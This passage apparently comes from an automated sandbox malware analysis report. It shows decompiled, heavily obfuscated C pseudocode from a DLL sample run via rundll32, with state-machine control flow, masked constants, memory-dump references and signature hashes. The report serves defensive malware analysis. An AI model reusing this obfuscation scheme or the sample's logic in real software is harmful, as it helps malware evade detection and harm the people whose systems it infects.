                                                                        				_v1152 = _v1152 >> 0xf;
                                                                        				_v1152 = _v1152 + 0xb411;
                                                                        				_v1152 = _v1152 + 0x3cf;
                                                                        				_v1152 = _v1152 ^ 0x0000e46f;
                                                                        				_v1096 = 0x75ec;
                                                                        				_v1096 = _v1096 + 0xffff70cd;
                                                                        				_v1096 = _v1096 ^ 0xfffffc52;
                                                                        				_v1104 = 0x93ae;
                                                                        				_v1104 = _v1104 / _t303;
                                                                        				_v1104 = _v1104 + 0xffff015e;
                                                                        				_v1104 = _v1104 ^ 0xffff7730;
                                                                        				_v1056 = 0xbdf9;
                                                                        				_v1056 = _v1056 ^ 0xd4f8d9ff;
                                                                        				_v1056 = _v1056 ^ 0xd4f80819;
                                                                        				_v1128 = 0xf240;
                                                                        				_v1128 = _v1128 + 0xffffadf5;
                                                                        				_t304 = 0x6e;
                                                                        				_v1128 = _v1128 * 0x47;
                                                                        				_v1128 = _v1128 ^ 0x002c66a2;
                                                                        				_v1060 = 0xbfc0;
                                                                        				_v1060 = _v1060 >> 3;
                                                                        				_v1060 = _v1060 ^ 0x00003168;
                                                                        				_v1164 = 0xfebb;
                                                                        				_v1164 = _v1164 + 0xffff52f0;
                                                                        				_v1164 = _v1164 / _t304;
                                                                        				_t305 = 0x5a;
                                                                        				_v1164 = _v1164 / _t305;
                                                                        				_v1164 = _v1164 ^ 0x00003ceb;
                                                                        				_v1136 = 0x6ebb;
                                                                        				_v1136 = _v1136 >> 0xe;
                                                                        				_v1136 = _v1136 << 0xe;
                                                                        				_v1136 = _v1136 ^ 0x00005f7f;
                                                                        				_v1120 = 0xe73f;
                                                                        				_v1120 = _v1120 ^ 0x98e7fdaf;
                                                                        				_v1120 = _v1120 << 3;
                                                                        				_v1120 = _v1120 ^ 0xc7388f6f;
                                                                        				_v1112 = 0x84f4;
                                                                        				_v1112 = _v1112 | 0xf7194f1a;
                                                                        				_v1112 = _v1112 + 0xffffc2ac;
                                                                        				_v1112 = _v1112 ^ 0xf719aa5d;
                                                                        				_v1156 = 0x76fc;
                                                                        				_v1156 = _v1156 + 0xffff5f4d;
                                                                        				_v1156 = _v1156 + 0xffffa6b8;
                                                                        				_v1156 = _v1156 + 0xd873;
                                                                        				_v1156 = _v1156 ^ 0x000078a0;
                                                                        				_v1124 = 0x47e1;
                                                                        				_t306 = 0x21;
                                                                        				_v1124 = _v1124 / _t306;
                                                                        				_v1124 = _v1124 >> 0xd;
                                                                        				_v1124 = _v1124 ^ 0x000072fc;
                                                                        				_v1148 = 0x5566;
                                                                        				_v1148 = _v1148 + 0xffff28de;
                                                                        				_t307 = 0x31;
                                                                        				_v1148 = _v1148 * 0x4f;
                                                                        				_v1148 = _v1148 << 8;
                                                                        				_v1148 = _v1148 ^ 0xd7f6da53;
                                                                        				_v1132 = 0xf4f2;
                                                                        				_v1132 = _v1132 << 3;
                                                                        				_v1132 = _v1132 + 0x5d4f;
                                                                        				_v1132 = _v1132 ^ 0x00082308;
                                                                        				_v1100 = 0x806a;
                                                                        				_v1100 = _v1100 >> 9;
                                                                        				_v1100 = _v1100 / _t307;
                                                                        				_v1100 = _v1100 ^ 0x00006f90;
                                                                        				_v1144 = 0x33d6;
                                                                        				_v1144 = _v1144 >> 9;
                                                                        				_v1144 = _v1144 >> 4;
                                                                        				_v1144 = _v1144 | 0x773178e8;
                                                                        				_v1144 = _v1144 ^ 0x7731353c;
                                                                        				_v1064 = 0x1023;
                                                                        				_v1064 = _v1064 + 0x46cd;
                                                                        				_v1064 = _v1064 ^ 0x00001a8d;
                                                                        				_t291 = E10014237();
                                                                        				do {
                                                                        					while(_t347 != 0x7d8ec07) {
                                                                        						if(_t347 == 0x1eca11d1) {
                                                                        							return E10013D7C( &_v520, __eflags, _v1144, _v1064,  &_v1040);
                                                                        						}
                                                                        						if(_t347 == 0x311804be) {
                                                                        							_t347 = 0x7d8ec07;
                                                                        							continue;
                                                                        						}
                                                                        						_t357 = _t347 - 0x3581d11e;
                                                                        						if(_t347 != 0x3581d11e) {
                                                                        							goto L8;
                                                                        						}
                                                                        						_push(0x10001050);
                                                                        						_push(_v1056);
                                                                        						_t297 = E1001BF25(_v1096, _v1104, _t357);
                                                                        						E100164EC(E10017B6B(), _t357, _t297, _v1164, 0x104,  *0x100221b0 + 0x10,  *0x100221b0 + 0x234, _v1136, _v1120, _v1112);
                                                                        						_t291 = E1001C5F7(_v1156, _v1124, _v1148, _v1132, _t297);
                                                                        						_t351 =  &(_t351[0xd]);
                                                                        						_t347 = 0x1eca11d1;
                                                                        					}
                                                                        					_push(0x10001000);
                                                                        					_push(_v1168);
                                                                        					E100163BF(E1001BF25(_v1076, _v1160, __eflags), __eflags, _v1140, _v1116,  &_v1040,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1052);
                                                                        					_t291 = E1001C5F7(_v1072, _v1080, _v1088, _v1152, _t292);
                                                                        					_t351 =  &(_t351[0xb]);
                                                                        					_t347 = 0x3581d11e;
                                                                        					L8:
                                                                        					__eflags = _t347 - 0x3fe593;
                                                                        				} while (__eflags != 0);
                                                                        				return _t291;
                                                                        			}
                                                                        0x100197d2
                                                                        0x100197d7
                                                                        0x100197e6
                                                                        0x1001982d
                                                                        0x10019843
                                                                        0x10019848
                                                                        0x1001984b
                                                                        0x1001984b
                                                                        0x10019859
                                                                        0x1001985e
                                                                        0x100198a9
                                                                        0x100198c8
                                                                        0x100198cd
                                                                        0x100198d0
                                                                        0x100198d2
                                                                        0x100198d2
                                                                        0x100198d2
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0l$<51w$?$O]$]5$an$h1$o$p,$<$G$u
                                                                        • API String ID: 0-3006474019
                                                                        • Opcode ID: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
                                                                        • Instruction ID: ac942b02fd569ebf8a703113eda67409e276ddad1249719e751fe3bc4d0fd9ab
                                                                        • Opcode Fuzzy Hash: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
                                                                        • Instruction Fuzzy Hash: 71D111715087819FE368CF24C98954BBBE1FBC4748F208A1CF5D59A2A0D7B5D989CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 99%
                                                                        			E10006BC0() {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _t254;
                                                                        				intOrPtr _t256;
                                                                        				intOrPtr _t258;
                                                                        				void* _t259;
                                                                        				signed int _t261;
                                                                        				signed int _t262;
                                                                        				signed int _t263;
                                                                        				signed int _t264;
                                                                        				signed int _t265;
                                                                        				signed int _t266;
                                                                        				signed int _t267;
                                                                        				void* _t299;
                                                                        				char _t303;
                                                                        				signed int* _t304;
                                                                        				void* _t306;
                                                                        
                                                                        				_t304 =  &_v116;
                                                                        				_v56 = 0x84b9;
                                                                        				_v56 = _v56 << 0xb;
                                                                        				_v56 = _v56 + 0x5ea0;
                                                                        				_v56 = _v56 ^ 0x0426650f;
                                                                        				_v108 = 0x299e;
                                                                        				_v108 = _v108 >> 8;
                                                                        				_v108 = _v108 >> 0xa;
                                                                        				_v108 = _v108 >> 0xc;
                                                                        				_v108 = _v108 ^ 0x000045b0;
                                                                        				_v112 = 0xab11;
                                                                        				_v112 = _v112 << 0x10;
                                                                        				_v112 = _v112 + 0xffff3408;
                                                                        				_v112 = _v112 << 6;
                                                                        				_v112 = _v112 ^ 0xc40d3ae9;
                                                                        				_v80 = 0xee41;
                                                                        				_t261 = 0x22;
                                                                        				_v80 = _v80 / _t261;
                                                                        				_v80 = _v80 ^ 0x83f67a84;
                                                                        				_t259 = 0;
                                                                        				_v80 = _v80 ^ 0x83f65317;
                                                                        				_t299 = 0x23ec3b81;
                                                                        				_v116 = 0xfedd;
                                                                        				_v116 = _v116 + 0xd1e5;
                                                                        				_t262 = 0x7f;
                                                                        				_v116 = _v116 / _t262;
                                                                        				_v116 = _v116 << 0xc;
                                                                        				_v116 = _v116 ^ 0x003ad050;
                                                                        				_v44 = 0xeb09;
                                                                        				_t263 = 0x2e;
                                                                        				_v44 = _v44 * 0x66;
                                                                        				_v44 = _v44 ^ 0x005de128;
                                                                        				_v48 = 0x515a;
                                                                        				_v48 = _v48 | 0x7fc990a4;
                                                                        				_v48 = _v48 ^ 0x7fc9cd68;
                                                                        				_v84 = 0xaabb;
                                                                        				_v84 = _v84 >> 1;
                                                                        				_v84 = _v84 * 0x5b;
                                                                        				_v84 = _v84 ^ 0x001e5e5d;
                                                                        				_v96 = 0x583;
                                                                        				_v96 = _v96 + 0xd9a1;
                                                                        				_v96 = _v96 / _t263;
                                                                        				_v96 = _v96 + 0x3e5;
                                                                        				_v96 = _v96 ^ 0x000008a1;
                                                                        				_v100 = 0x8d71;
                                                                        				_t264 = 0x53;
                                                                        				_v100 = _v100 * 0xd;
                                                                        				_v100 = _v100 >> 4;
                                                                        				_v100 = _v100 / _t264;
                                                                        				_v100 = _v100 ^ 0x00004ab6;
                                                                        				_v76 = 0xeaf8;
                                                                        				_v76 = _v76 << 0xb;
                                                                        				_v76 = _v76 << 5;
                                                                        				_v76 = _v76 ^ 0xeaf83e17;
                                                                        				_v104 = 0xfdf7;
                                                                        				_v104 = _v104 + 0xffff8125;
                                                                        				_v104 = _v104 >> 0xc;
                                                                        				_v104 = _v104 << 2;
                                                                        				_v104 = _v104 ^ 0x00004c62;
                                                                        				_v40 = 0x8162;
                                                                        				_v40 = _v40 | 0xc691c83f;
                                                                        				_v40 = _v40 ^ 0xc691a24d;
                                                                        				_v72 = 0x9e4d;
                                                                        				_v72 = _v72 << 0xc;
                                                                        				_v72 = _v72 + 0xffff6436;
                                                                        				_v72 = _v72 ^ 0x09e41bc8;
                                                                        				_v92 = 0x78eb;
                                                                        				_v92 = _v92 >> 0xa;
                                                                        				_v92 = _v92 | 0xec9d9334;
                                                                        				_v92 = _v92 << 0xc;
                                                                        				_v92 = _v92 ^ 0xd933d049;
                                                                        				_v36 = 0x856f;
                                                                        				_t265 = 0x39;
                                                                        				_v36 = _v36 / _t265;
                                                                        				_v36 = _v36 ^ 0x00001c57;
                                                                        				_v60 = 0x6631;
                                                                        				_v60 = _v60 >> 2;
                                                                        				_v60 = _v60 + 0xffffdfe4;
                                                                        				_v60 = _v60 ^ 0xffffcf25;
                                                                        				_v64 = 0x3444;
                                                                        				_v64 = _v64 >> 0xf;
                                                                        				_v64 = _v64 >> 0xf;
                                                                        				_v64 = _v64 ^ 0x00000359;
                                                                        				_v68 = 0xe444;
                                                                        				_t266 = 0x50;
                                                                        				_v68 = _v68 / _t266;
                                                                        				_v68 = _v68 + 0x16a0;
                                                                        				_v68 = _v68 ^ 0x00006446;
                                                                        				_v32 = 0xb62e;
                                                                        				_v32 = _v32 >> 7;
                                                                        				_v32 = _v32 ^ 0x00006ec1;
                                                                        				_v52 = 0x9375;
                                                                        				_v52 = _v52 >> 8;
                                                                        				_t267 = 0x71;
                                                                        				_v52 = _v52 * 0xb;
                                                                        				_v52 = _v52 ^ 0x00007061;
                                                                        				_v88 = 0x468b;
                                                                        				_v88 = _v88 / _t267;
                                                                        				_v88 = _v88 * 0x47;
                                                                        				_v88 = _v88 >> 2;
                                                                        				_v88 = _v88 ^ 0x0000270a;
                                                                        				_t298 = _v28;
                                                                        				_t303 = _v28;
                                                                        				goto L1;
                                                                        				do {
                                                                        					while(1) {
                                                                        						L1:
                                                                        						_t306 = _t299 - 0x23ec3b81;
                                                                        						if(_t306 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t306 == 0) {
                                                                        							_t299 = 0x2b5ba3b6;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t299 == 0x591e35e) {
                                                                        							E1001B981(_v40, _v8 + 1,  *0x100221b0 + 0x10, _v12, _v72, _v92);
                                                                        							_t304 =  &(_t304[4]);
                                                                        							_t259 = 1;
                                                                        							_t299 = 0x3378ea2d;
                                                                        							 *((intOrPtr*)( *0x100221b0)) = _v16;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t299 == 0x5f14f0f) {
                                                                        							_t254 = E1001CAA0( &_v24, _v96,  &_v16, _v100, _v76, _v104);
                                                                        							_t304 =  &(_t304[4]);
                                                                        							asm("sbb esi, esi");
                                                                        							_t299 = ( ~_t254 & 0xd218f931) + 0x3378ea2d;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t299 == 0xba7b4d4) {
                                                                        							_t256 = E1001B806(_v108, _t303, _v112, _v80,  &_v28);
                                                                        							_t298 = _t256;
                                                                        							_t304 =  &(_t304[3]);
                                                                        							if(_t256 == 0) {
                                                                        								L23:
                                                                        								return _t259;
                                                                        							}
                                                                        							_t299 = 0x176f3fd8;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t299 != 0x176f3fd8) {
                                                                        							goto L20;
                                                                        						} else {
                                                                        							_t299 = 0x2e66d4aa;
                                                                        							if(_v28 > 2) {
                                                                        								_t258 = E10015AB8(_v116, _v44, _v48,  *((intOrPtr*)(_t298 + 8)),  &_v20, _v84);
                                                                        								_t304 =  &(_t304[4]);
                                                                        								_v24 = _t258;
                                                                        								if(_t258 != 0) {
                                                                        									_t299 = 0x5f14f0f;
                                                                        								}
                                                                        							}
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					if(_t299 == 0x2b5ba3b6) {
                                                                        						_t303 = E1001B8E7();
                                                                        						_t299 = 0xba7b4d4;
                                                                        						goto L20;
                                                                        					}
                                                                        					if(_t299 == 0x2e66d4aa) {
                                                                        						E10007BE0(_v32, _t298, _v52, _v88);
                                                                        						goto L23;
                                                                        					}
                                                                        					if(_t299 != 0x3378ea2d) {
                                                                        						goto L20;
                                                                        					}
                                                                        					E100091CD(_v36, _v60, _v64, _v24, _v68);
                                                                        					_t304 =  &(_t304[3]);
                                                                        					_t299 = 0x2e66d4aa;
                                                                        					goto L1;
                                                                        					L20:
                                                                        				} while (_t299 != 0x16656518);
                                                                        				goto L23;
                                                                        			}

                                                                        0x10006e2d
                                                                        0x10006e35
                                                                        0x10006e3d
                                                                        0x10006e45
                                                                        0x10006e4a
                                                                        0x10006e52
                                                                        0x10006e5a
                                                                        0x10006e64
                                                                        0x10006e65
                                                                        0x10006e69
                                                                        0x10006e71
                                                                        0x10006e7f
                                                                        0x10006e88
                                                                        0x10006e8c
                                                                        0x10006e91
                                                                        0x10006e99
                                                                        0x10006e9d
                                                                        0x10006e9d
                                                                        0x10006ea1
                                                                        0x10006ea1
                                                                        0x10006ea1
                                                                        0x10006ea1
                                                                        0x10006ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006ead
                                                                        0x10006fc6
                                                                        0x00000000
                                                                        0x10006fc6
                                                                        0x10006eb9
                                                                        0x10006fa3
                                                                        0x10006fb6
                                                                        0x10006fb9
                                                                        0x10006fba
                                                                        0x10006fbf
                                                                        0x00000000
                                                                        0x10006fbf
                                                                        0x10006ec5
                                                                        0x10006f5e
                                                                        0x10006f63
                                                                        0x10006f6a
                                                                        0x10006f72
                                                                        0x00000000
                                                                        0x10006f72
                                                                        0x10006ecd
                                                                        0x10006f29
                                                                        0x10006f2e
                                                                        0x10006f30
                                                                        0x10006f35
                                                                        0x10007044
                                                                        0x1000704a
                                                                        0x1000704a
                                                                        0x10006f3b
                                                                        0x00000000
                                                                        0x10006f3b
                                                                        0x10006ed5
                                                                        0x00000000
                                                                        0x10006edb
                                                                        0x10006ee0
                                                                        0x10006ee5
                                                                        0x10006eff
                                                                        0x10006f04
                                                                        0x10006f07
                                                                        0x10006f0d
                                                                        0x10006f0f
                                                                        0x10006f0f
                                                                        0x10006f0d
                                                                        0x00000000
                                                                        0x10006ee5
                                                                        0x10006ed5
                                                                        0x10006fd6
                                                                        0x10007017
                                                                        0x10007019
                                                                        0x00000000
                                                                        0x10007019
                                                                        0x10006fde
                                                                        0x1000703a
                                                                        0x00000000
                                                                        0x10007040
                                                                        0x10006fe6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006ffc
                                                                        0x10007001
                                                                        0x10007004
                                                                        0x00000000
                                                                        0x1000701e
                                                                        0x1000701e
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: '$(]$-x3$-x3$1f$A$D4$Fd$ZQ$ap$bL$x
                                                                        • API String ID: 0-4015965578
                                                                        • Opcode ID: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
                                                                        • Instruction ID: 7f07636c7d856d37613f0c6add9871aecd81a47647e8cfb522ba5c80404945ec
                                                                        • Opcode Fuzzy Hash: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
                                                                        • Instruction Fuzzy Hash: 95C141729083419FE714CF25C88A40BBBE2FBC4798F20891DF599962A4D7B9D948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1001B3FE() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				intOrPtr _v1044;
                                                                        				intOrPtr _v1048;
                                                                        				intOrPtr _v1052;
                                                                        				signed int _v1056;
                                                                        				signed int _v1060;
                                                                        				signed int _v1064;
                                                                        				signed int _v1068;
                                                                        				signed int _v1072;
                                                                        				signed int _v1076;
                                                                        				signed int _v1080;
                                                                        				signed int _v1084;
                                                                        				signed int _v1088;
                                                                        				signed int _v1092;
                                                                        				signed int _v1096;
                                                                        				signed int _v1100;
                                                                        				signed int _v1104;
                                                                        				signed int _v1108;
                                                                        				signed int _v1112;
                                                                        				signed int _v1116;
                                                                        				signed int _v1120;
                                                                        				signed int _v1124;
                                                                        				signed int _v1128;
                                                                        				signed int _v1132;
                                                                        				unsigned int _v1136;
                                                                        				void* _t216;
                                                                        				void* _t229;
                                                                        				intOrPtr _t258;
                                                                        				signed int _t259;
                                                                        				signed int _t260;
                                                                        				signed int _t261;
                                                                        				signed int _t262;
                                                                        				signed int _t263;
                                                                        				unsigned int* _t266;
                                                                        
                                                                        				_t266 =  &_v1136;
                                                                        				_v1052 = 0x59feef;
                                                                        				_v1048 = 0x2a3fe0;
                                                                        				_t229 = 0x3abfade2;
                                                                        				_t258 = 0;
                                                                        				_v1044 = 0;
                                                                        				_v1096 = 0x3e7b;
                                                                        				_v1096 = _v1096 << 8;
                                                                        				_v1096 = _v1096 | 0x4b45bfac;
                                                                        				_v1096 = _v1096 ^ 0x4b7f9484;
                                                                        				_v1120 = 0xeeae;
                                                                        				_v1120 = _v1120 + 0xffff949c;
                                                                        				_v1120 = _v1120 + 0xffff26d2;
                                                                        				_v1120 = _v1120 ^ 0xc3b4e966;
                                                                        				_v1120 = _v1120 ^ 0x3c4b1d4d;
                                                                        				_v1088 = 0x77a0;
                                                                        				_v1088 = _v1088 | 0x40386f55;
                                                                        				_v1088 = _v1088 << 0x10;
                                                                        				_v1088 = _v1088 ^ 0x7ff5165c;
                                                                        				_v1064 = 0xf0bf;
                                                                        				_v1064 = _v1064 << 9;
                                                                        				_v1064 = _v1064 ^ 0x01e162a5;
                                                                        				_v1072 = 0x124d;
                                                                        				_t259 = 0x72;
                                                                        				_v1072 = _v1072 / _t259;
                                                                        				_v1072 = _v1072 ^ 0x00002ee6;
                                                                        				_v1128 = 0x5292;
                                                                        				_v1128 = _v1128 << 8;
                                                                        				_v1128 = _v1128 + 0xe9bf;
                                                                        				_v1128 = _v1128 + 0x3238;
                                                                        				_v1128 = _v1128 ^ 0x0053b92a;
                                                                        				_v1136 = 0xc2f1;
                                                                        				_v1136 = _v1136 + 0x6410;
                                                                        				_v1136 = _v1136 >> 0xc;
                                                                        				_v1136 = _v1136 + 0x63d1;
                                                                        				_v1136 = _v1136 ^ 0x00000ac7;
                                                                        				_v1112 = 0x7058;
                                                                        				_t260 = 0x4b;
                                                                        				_v1112 = _v1112 * 0xd;
                                                                        				_v1112 = _v1112 << 6;
                                                                        				_v1112 = _v1112 + 0x987c;
                                                                        				_v1112 = _v1112 ^ 0x016df42c;
                                                                        				_v1100 = 0x41a9;
                                                                        				_v1100 = _v1100 + 0xffffec41;
                                                                        				_v1100 = _v1100 + 0xffff9ba9;
                                                                        				_v1100 = _v1100 ^ 0xffffd6d5;
                                                                        				_v1104 = 0x872a;
                                                                        				_v1104 = _v1104 / _t260;
                                                                        				_v1104 = _v1104 >> 0x10;
                                                                        				_v1104 = _v1104 ^ 0x0000287c;
                                                                        				_v1080 = 0x8003;
                                                                        				_v1080 = _v1080 | 0x7adfffb6;
                                                                        				_v1080 = _v1080 ^ 0x7adf96d6;
                                                                        				_v1084 = 0x5426;
                                                                        				_v1084 = _v1084 + 0xe4e2;
                                                                        				_v1084 = _v1084 ^ 0xc6a85055;
                                                                        				_v1084 = _v1084 ^ 0xc6a96844;
                                                                        				_v1092 = 0x916a;
                                                                        				_v1092 = _v1092 >> 0x10;
                                                                        				_v1092 = _v1092 | 0x14ea685d;
                                                                        				_v1092 = _v1092 ^ 0x14ea6f72;
                                                                        				_v1056 = 0x7cb0;
                                                                        				_v1056 = _v1056 >> 7;
                                                                        				_v1056 = _v1056 ^ 0x000061a1;
                                                                        				_v1132 = 0x4cf9;
                                                                        				_v1132 = _v1132 ^ 0x2fb41e14;
                                                                        				_v1132 = _v1132 ^ 0xb509e885;
                                                                        				_v1132 = _v1132 + 0x3858;
                                                                        				_v1132 = _v1132 ^ 0x9abd8624;
                                                                        				_v1124 = 0xb90b;
                                                                        				_v1124 = _v1124 | 0x9d483c7c;
                                                                        				_t261 = 0x31;
                                                                        				_v1124 = _v1124 / _t261;
                                                                        				_v1124 = _v1124 << 0x10;
                                                                        				_v1124 = _v1124 ^ 0xbab966f1;
                                                                        				_v1076 = 0x4837;
                                                                        				_t262 = 0x28;
                                                                        				_v1076 = _v1076 * 0x42;
                                                                        				_v1076 = _v1076 ^ 0x39645d85;
                                                                        				_v1076 = _v1076 ^ 0x3976b123;
                                                                        				_v1060 = 0xa4fd;
                                                                        				_v1060 = _v1060 / _t262;
                                                                        				_v1060 = _v1060 ^ 0x00000d98;
                                                                        				_v1068 = 0x96bf;
                                                                        				_v1068 = _v1068 | 0xc49b968d;
                                                                        				_v1068 = _v1068 ^ 0xc49bbea0;
                                                                        				_v1108 = 0xf482;
                                                                        				_v1108 = _v1108 + 0xffffa317;
                                                                        				_v1108 = _v1108 | 0x011b1071;
                                                                        				_v1108 = _v1108 << 2;
                                                                        				_v1108 = _v1108 ^ 0x046e6bfd;
                                                                        				_v1116 = 0x4fbc;
                                                                        				_v1116 = _v1116 + 0xffff81fd;
                                                                        				_v1116 = _v1116 + 0xffff31d8;
                                                                        				_t263 = 5;
                                                                        				_v1116 = _v1116 / _t263;
                                                                        				_v1116 = _v1116 ^ 0x33332c42;
                                                                        				do {
                                                                        					while(_t229 != 0xe952e95) {
                                                                        						if(_t229 == 0x1126b32b) {
                                                                        							_push(0x10001000);
                                                                        							_push(_v1128);
                                                                        							E100163BF(E1001BF25(_v1064, _v1072, __eflags), __eflags, _v1112, _v1100,  &_v1040,  *0x100221b0, _v1104,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1080);
                                                                        							E1001C5F7(_v1084, _v1092, _v1056, _v1132, _t217);
                                                                        							_t266 =  &(_t266[0xb]);
                                                                        							_t229 = 0xe952e95;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t229 == 0x2ea5cfd6) {
                                                                        								E10008C0C(_v1096, __eflags, _v1120, _v1088,  &_v520);
                                                                        								_t266 =  &(_t266[3]);
                                                                        								_t229 = 0x1126b32b;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t229 == 0x3423edaf) {
                                                                        									E1001654F(_v1068, _v1108, _v1116,  &_v1040);
                                                                        								} else {
                                                                        									if(_t229 != 0x3abfade2) {
                                                                        										goto L10;
                                                                        									} else {
                                                                        										_t229 = 0x2ea5cfd6;
                                                                        										continue;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L13:
                                                                        						return _t258;
                                                                        					}
                                                                        					_t216 = E10013D7C( &_v1040, __eflags, _v1076, _v1060,  &_v520);
                                                                        					_t266 =  &(_t266[3]);
                                                                        					__eflags = _t216;
                                                                        					_t258 =  !=  ? 1 : _t258;
                                                                        					_t229 = 0x3423edaf;
                                                                        					L10:
                                                                        					__eflags = _t229 - 0x8af5a53;
                                                                        				} while (__eflags != 0);
                                                                        				goto L13;
                                                                        			}

                                                                        0x1001b5ba
                                                                        0x1001b5c2
                                                                        0x1001b5ca
                                                                        0x1001b5cf
                                                                        0x1001b5d7
                                                                        0x1001b5df
                                                                        0x1001b5e7
                                                                        0x1001b5ef
                                                                        0x1001b5f7
                                                                        0x1001b5ff
                                                                        0x1001b609
                                                                        0x1001b621
                                                                        0x1001b626
                                                                        0x1001b62c
                                                                        0x1001b631
                                                                        0x1001b639
                                                                        0x1001b646
                                                                        0x1001b649
                                                                        0x1001b64d
                                                                        0x1001b655
                                                                        0x1001b65d
                                                                        0x1001b66d
                                                                        0x1001b671
                                                                        0x1001b679
                                                                        0x1001b681
                                                                        0x1001b689
                                                                        0x1001b691
                                                                        0x1001b699
                                                                        0x1001b6a1
                                                                        0x1001b6a9
                                                                        0x1001b6ae
                                                                        0x1001b6b6
                                                                        0x1001b6be
                                                                        0x1001b6c6
                                                                        0x1001b6d2
                                                                        0x1001b6d5
                                                                        0x1001b6d9
                                                                        0x1001b6e1
                                                                        0x1001b6e1
                                                                        0x1001b6ef
                                                                        0x1001b731
                                                                        0x1001b736
                                                                        0x1001b77b
                                                                        0x1001b794
                                                                        0x1001b799
                                                                        0x1001b79c
                                                                        0x00000000
                                                                        0x1001b6f1
                                                                        0x1001b6f3
                                                                        0x1001b725
                                                                        0x1001b72a
                                                                        0x1001b72d
                                                                        0x00000000
                                                                        0x1001b6f5
                                                                        0x1001b6fb
                                                                        0x1001b7f2
                                                                        0x1001b701
                                                                        0x1001b707
                                                                        0x00000000
                                                                        0x1001b70d
                                                                        0x1001b70d
                                                                        0x00000000
                                                                        0x1001b70d
                                                                        0x1001b707
                                                                        0x1001b6fb
                                                                        0x1001b6f3
                                                                        0x1001b7f9
                                                                        0x1001b805
                                                                        0x1001b805
                                                                        0x1001b7be
                                                                        0x1001b7c5
                                                                        0x1001b7c9
                                                                        0x1001b7cb
                                                                        0x1001b7ce
                                                                        0x1001b7d3
                                                                        0x1001b7d3
                                                                        0x1001b7d3
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &T$7H$82$B,33$Uo8@$X8$Xp${>$|($.$?*
                                                                        • API String ID: 0-2199102758
                                                                        • Opcode ID: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
                                                                        • Instruction ID: 713d83d0593c4ddd124331638c6b3f8c97ab7d5c779b93df35cbcb4d530e2ad3
                                                                        • Opcode Fuzzy Hash: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
                                                                        • Instruction Fuzzy Hash: 69A1107150C3809FE398CF25D88985BBBE1FBC4358F504A1DF5969A2A0D7B5CA89CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 99%
                                                                        			E10016B45() {
                                                                        				void* _t369;
                                                                        				signed int _t372;
                                                                        				signed int _t373;
                                                                        				intOrPtr* _t374;
                                                                        				signed int _t376;
                                                                        				signed int _t378;
                                                                        				signed int _t383;
                                                                        				signed int _t389;
                                                                        				void* _t395;
                                                                        				signed int _t431;
                                                                        				signed int _t432;
                                                                        				signed int _t435;
                                                                        				signed int _t436;
